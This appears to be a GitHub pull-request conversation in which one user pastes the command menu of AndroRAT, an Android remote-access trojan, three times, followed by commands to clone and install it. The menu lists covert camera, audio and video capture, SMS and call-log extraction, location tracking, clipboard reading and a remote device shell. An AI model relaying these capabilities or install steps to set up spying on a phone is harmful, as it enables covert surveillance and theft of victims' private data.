Skip to content

Conversation

evamazed955-ui
Copy link

deviceInfo                 --> returns basic info of the device
camList                    --> returns cameraID  
takepic [cameraID]         --> Takes picture from camera
startVideo [cameraID]      --> starts recording the video
stopVideo                  --> stop recording the video and return the video file
startAudio                 --> starts recording the audio
stopAudio                  --> stop recording the audio
getSMS [inbox|sent]        --> returns inbox sms or sent sms in a file 
getCallLogs                --> returns call logs in a file
shell                      --> starts a sh shell of the device
vibrate [number_of_times]  --> vibrate the device number of time
getLocation                --> return the current location of the device
getIP                      --> returns the ip of the device
getSimDetails              --> returns the details of all sim of the device
clear                      --> clears the screen
getClipData                --> return the current saved text from the clipboard
getMACAddress              --> returns the mac address of the device
exit                       --> exit the interpreter

    deviceInfo                 --> returns basic info of the device
    camList                    --> returns cameraID  
    takepic [cameraID]         --> Takes picture from camera
    startVideo [cameraID]      --> starts recording the video
    stopVideo                  --> stop recording the video and return the video file
    startAudio                 --> starts recording the audio
    stopAudio                  --> stop recording the audio
    getSMS [inbox|sent]        --> returns inbox sms or sent sms in a file 
    getCallLogs                --> returns call logs in a file
    shell                      --> starts a sh shell of the device
    vibrate [number_of_times]  --> vibrate the device number of time
    getLocation                --> return the current location of the device
    getIP                      --> returns the ip of the device
    getSimDetails              --> returns the details of all sim of the device
    clear                      --> clears the screen
    getClipData                --> return the current saved text from the clipboard
    getMACAddress              --> returns the mac address of the device
    exit                       --> exit the interpreter
@evamazed955-ui
Copy link
Author

_ deviceInfo --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts a sh shell of the device
vibrate [number_of_times] --> vibrate the device number of time
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter

@evamazed955-ui
Copy link
Author

git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT
pip install -r requirements.txt

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant